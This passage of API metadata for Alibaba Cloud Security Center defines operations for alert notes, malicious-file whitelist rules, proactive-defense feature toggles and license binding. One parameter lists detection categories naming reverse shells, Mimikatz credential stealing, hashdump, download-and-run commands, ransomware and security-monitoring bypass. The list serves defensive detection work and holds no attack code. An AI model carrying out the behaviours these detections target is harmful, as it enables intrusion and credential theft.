'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'BatchCreateMaliciousNote' => [ 'summary' => 'Adds alert description in batches.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '185664', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ImageMaliciousFileList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The batches.'."\n", 'items' => [ 'properties' => [ 'EventId' => ['description' => 'The ID of the alert.'."\n" ."\n" .'> You can call the [DescribeSuspEvents](~~DescribeSuspEvents~~) operation to query the alert IDs.'."\n", 'example' => '1', 'format' => 'int64', 'required' => false, 'title' => '', 'type' => 'integer'], 'Note' => ['description' => 'The description.'."\n", 'example' => 'Malware sample', 'required' => false, 'title' => '', 'type' => 'string'], ], 'required' => false, 'type' => 'object', 'description' => '', 'title' => '', 'example' => '', ], 'maxItems' => 100, 'required' => false, 'type' => 'array', 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'PlainResult'."\n", 'properties' => [ 'Success' => ['description' => 'Indicates whether the call is successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'example' => 'true', 'type' => 'boolean', 'title' => ''], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'example' => '200', 'type' => 'string', 'title' => ''], 'Message' => ['description' => 'The message returned.'."\n", 'example' => 'successful', 'type' => 'string', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'type' => 'string', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.'."\n", 'example' => '200', 'format' => 'int32', 'type' => 'integer', 'title' => ''], ], 'title' => 'PlainResult', 'type' => 'object', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'BatchCreateMaliciousNote', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'BatchCreateMaliciousNote'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:BatchCreateMaliciousNote', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'BatchDeleteMaliciousFileWhitelistConfig' => [ 'summary' => 'Deletes whitelist rules for alerts generated for sensitive files that are detected by using the agentless detection feature in batches.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '184623', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], ], 'parameters' => [ [ 'name' => 'ConfigIdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The IDs of the whitelist rules. You can call the [ListMaliciousFileWhitelistConfigs](~~ListMaliciousFileWhitelistConfigs~~) operation to query the IDs of whitelist rules.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the whitelist rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 100, 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'BaseResult', 'description' => 'BaseResult'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'A3D7C47D-3F11-57BB-90E8-E5C20C61****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code. The status code 200 indicates that the request was successful.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"A3D7C47D-3F11-57BB-90E8-E5C20C61****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'BatchDeleteMaliciousFileWhitelistConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'BatchDeleteMaliciousFileWhitelistConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:BatchDeleteMaliciousFileWhitelistConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'BatchOperateCommonOverallConfig' => [ 'summary' => 'Enables or disables multiple features in proactive defense at a time.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '91909', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Config', 'in' => 'query', 'schema' => ['description' => 'The status of the feature. Valid values:'."\n" ."\n" .'* **on**: enabled'."\n" .'* **off**: disabled'."\n", 'type' => 'string', 'required' => true, 'example' => 'on', 'title' => ''], ], [ 'name' => 'TypeList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The type of the feature in proactive defense. Valid values:'."\n" ."\n" .'* **kdump_switch**: Active defense experience optimization'."\n" .'* **threat_detect**: Dynamic adaptive threat detection capability'."\n" .'* **suspicious_aggregation**: Alert Association'."\n" .'* **alidetect**: File Test'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_38857**: Entrance service execution high-risk operation (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50858**: Web service performs high-risk operations (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50859**: Entrance service execution suspicious operation (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50862**: Cloud Assistant Advanced Protection (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50867**: Create malicious files (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50868**: Create suspicious files (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_64025**: Ingress service execute command \\[enhanced mode] (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51229**: Browser service execution a high-risk operation (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51230**: Entrance service execution suspicious operation (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51232**: System processes execution high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51233**: Java service execution high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51234**: Office components execution high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51235**: Web service performs high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52820**: Create malicious files (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52826**: Entrance service execution high-risk operation (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_55251**: Database services execution high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_63725**: Ingress service implants suspicious script/binary file (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_3277**: Suspicious process startup (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50983**: obfuscated command (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51200**: Command line download and run malicious files (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_71131**: Ingress service executes sequence of suspicious behavior (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51225**: Powershell executes high-risk commands (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51226**: Powershell execute suspicious command (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52821**: Suspicious process startup (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57242**: Malicious command execution (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57340**: Command line download and run malicious files (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_39659**: Sensitive Registry Key Protection (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52816**: high-risk account manipulation behavior (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54365**: Create service autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54366**: Create high-risk autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54367**: Create scheduled task autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54368**: Create registry autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54369**: Create WMI autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50869**: Unauthorized execution of high-risk orders (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_53272**: Exploiting Kernel Vulnerabilities to Elevate Privileges (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54395**: Unauthorized reading and writing of sensitive files (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57897**: suspected privilege escalation (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52825**: Unauthorized execution of high-risk orders (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_5507**: malicious drivers (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50876**: Against security software (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_53168**: process debugging (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54699**: Hijack dynamic link library (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_62981**: Bypassing security monitoring (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52815**: Load high-risk drivers (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52823**: Running high-risk ARK tools (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54373**: Against security software (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54374**: Intrusion trace cleanup (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54265**: Hijacking the PAM Module (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54953**: Hashdump Attack (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54383**: MimiKatz Credential Stealing (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54384**: Hashdump Attack (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50861**: Information detection (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52818**: Information detection (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54034**: Intranet scan (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51228**: High-risk lateral penetration tools (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50870**: Rebound Shell (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50873**: WebShell execute command'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51236**: Rebound Shell (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50877**: Malicious soft communication (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50884**: Suspicious worm script behavior (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50885**: malicious script behavior (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51201**: ransomware (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51202**: Suspected Extortion (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52827**: ransomware (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52828**: Suspected Extortion (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52829**: delete system backup behavior (Windows)'."\n", 'type' => 'array', 'items' => ['description' => 'The type of the feature in proactive defense. Valid values:'."\n" ."\n" .'* **kdump_switch**: Active defense experience optimization'."\n" .'* **threat_detect**: Dynamic adaptive threat detection capability'."\n" .'* **suspicious_aggregation**: Alert Association'."\n" .'* **alidetect**: File Test'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_38857**: Entrance service execution high-risk operation (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50858**: Web service performs high-risk operations (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50859**: Entrance service execution suspicious operation (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50862**: Cloud Assistant Advanced Protection (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50867**: Create malicious files (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50868**: Create suspicious files (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_64025**: Ingress service execute command \\[enhanced mode] (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51229**: Browser service execution a high-risk operation (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51230**: Entrance service execution suspicious operation (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51232**: System processes execution high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51233**: Java service execution high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51234**: Office components execution high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51235**: Web service performs high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52820**: Create malicious files (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52826**: Entrance service execution high-risk operation (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_55251**: Database services execution high-risk operations (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_63725**: Ingress service implants suspicious script/binary file (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_3277**: Suspicious process startup (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50983**: obfuscated command (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51200**: Command line download and run malicious files (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_71131**: Ingress service executes sequence of suspicious behavior (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51225**: Powershell executes high-risk commands (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51226**: Powershell execute suspicious command (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52821**: Suspicious process startup (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57242**: Malicious command execution (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57340**: Command line download and run malicious files (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_39659**: Sensitive Registry Key Protection (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52816**: high-risk account manipulation behavior (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54365**: Create service autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54366**: Create high-risk autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54367**: Create scheduled task autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54368**: Create registry autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54369**: Create WMI autorun item (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50869**: Unauthorized execution of high-risk orders (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_53272**: Exploiting Kernel Vulnerabilities to Elevate Privileges (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54395**: Unauthorized reading and writing of sensitive files (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57897**: suspected privilege escalation (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52825**: Unauthorized execution of high-risk orders (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_5507**: malicious drivers (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50876**: Against security software (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_53168**: process debugging (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54699**: Hijack dynamic link library (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_62981**: Bypassing security monitoring (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52815**: Load high-risk drivers (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52823**: Running high-risk ARK tools (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54373**: Against security software (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54374**: Intrusion trace cleanup (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54265**: Hijacking the PAM Module (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54953**: Hashdump Attack (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54383**: MimiKatz Credential Stealing (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54384**: Hashdump Attack (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50861**: Information detection (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52818**: Information detection (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54034**: Intranet scan (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51228**: High-risk lateral penetration tools (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50870**: Rebound Shell (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50873**: WebShell execute command'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51236**: Rebound Shell (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50877**: Malicious soft communication (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50884**: Suspicious worm script behavior (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50885**: malicious script behavior (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51201**: ransomware (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51202**: Suspected Extortion (Linux)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52827**: ransomware (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52828**: Suspected Extortion (Windows)'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52829**: delete system backup behavior (Windows)'."\n", 'type' => 'string', 'required' => false, 'example' => 'kdump_switch', 'title' => ''], 'required' => true, 'maxItems' => 50, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '765EDBDE-1686-5DBA-B76F-2E0E6E7E1B96', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"765EDBDE-1686-5DBA-B76F-2E0E6E7E1B96\\"\\n}","type":"json"}]', 'title' => 'BatchOperateCommonOverallConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'BatchOperateCommonOverallConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:BatchOperateCommonOverallConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'BatchUpdateMaliciousFileWhitelistConfig' => [ 'summary' => 'Modifies multiple alert whitelist rules of sensitive files that are detected by using the agentless detection feature at a time.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '184624', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], ], 'parameters' => [ [ 'name' => 'ConfigList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The whitelist rules.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'ConfigId' => ['title' => '', 'description' => 'The ID of the whitelist rule. If you do not specify this parameter, a whitelist rule is created.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1'], 'EventName' => ['title' => '', 'description' => 'The name of the alert.'."\n" ."\n" .'* Set the value to **ALL**, which indicates all alert types.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ALL'], 'Field' => ['title' => '', 'description' => 'The field that you want to use in the whitelist rule.'."\n", 'type' => 'string', 'required' => false, 'example' => 'fileMd5'], 'Operator' => ['title' => '', 'description' => 'The logical operator that you want to use in the whitelist rule.'."\n" ."\n" .'* Set the value to strEqual, which indicates the equality operator (=).'."\n", 'type' => 'string', 'required' => false, 'example' => 'strEqual'], 'FieldValue' => ['title' => '', 'description' => 'The value of the field that you want to use in the whitelist rule.'."\n", 'type' => 'string', 'required' => false, 'example' => 'b2cf9747ee49d8d9b105cf16e078cc16'], 'TargetType' => ['title' => '', 'description' => 'The type of the assets on which you want the whitelist rule to take effect. Valid values:'."\n" ."\n" .'* ALL: all assets'."\n" .'* SELECTION_KEY: selected assets'."\n", 'type' => 'string', 'required' => false, 'example' => 'ALL'], 'TargetValue' => ['title' => '', 'description' => 'The assets on which you want the whitelist rule to take effect. Valid values:'."\n" ."\n" .'* ALL: all assets'."\n" .'* Others: selected assets'."\n", 'type' => 'string', 'required' => false, 'example' => 'ALL'], 'Source' => ['title' => '', 'description' => 'The feature to which this operation belongs.'."\n" ."\n" .'* Set the value to agentless, which indicates the agentless detection feature.'."\n", 'type' => 'string', 'required' => false, 'example' => 'agentless'], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'BaseResult', 'description' => 'BaseResult'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ['errorCode' => 'DuplicateRule', 'errorMessage' => 'Duplicated rule, please check whether the same rule already exists.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'BatchUpdateMaliciousFileWhitelistConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'BatchUpdateMaliciousFileWhitelistConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:BatchUpdateMaliciousFileWhitelistConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'BindAuthToMachine' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91910', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The conditions for searching assets. This parameter is in JSON format. Pay attention to letter case when you specify this parameter.'."\n" .'> You can search for assets by instance ID, instance name, VPC ID, region, or public IP address. Call the [DescribeCriteria](~~DescribeCriteria~~) operation to query the supported search conditions.', 'type' => 'string', 'required' => false, 'example' => ' '."\n" .'[{"name":"riskStatus","value":"YES"},{"name":"internetIp","value":"1.2.XX.XX"}]', 'title' => ''], ], [ 'name' => 'LogicalExp', 'in' => 'query', 'schema' => ['description' => 'The logical relationship among multiple search conditions. Default value: **OR**. Valid values:'."\n" .'- **OR**: The search conditions are evaluated with a logical OR.'."\n" .'- **AND**: The search conditions are evaluated with a logical AND.', 'type' => 'string', 'required' => false, 'example' => 'OR', 'title' => ''], ], [ 'name' => 'BindAll', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to bind all assets. Default value: **false**. Valid values:'."\n" ."\n" .'- **true**: Bind all assets.'."\n" .'- **false**: Do not bind all assets.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'AuthVersion', 'in' => 'query', 'schema' => ['description' => 'The authorization version of the asset. Valid values:'."\n" .'- **6**: Anti-virus Edition'."\n" .'- **5**: Advanced Edition'."\n" .'- **3**: Enterprise Edition'."\n" .'- **7**: Ultimate Edition'."\n" .'- **10**: Value-added Service Edition.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '6', 'title' => ''], ], [ 'name' => 'AutoBind', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable automatic binding. Valid values:'."\n" ."\n" .'- **0**: disabled'."\n" .'- **1**: enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => 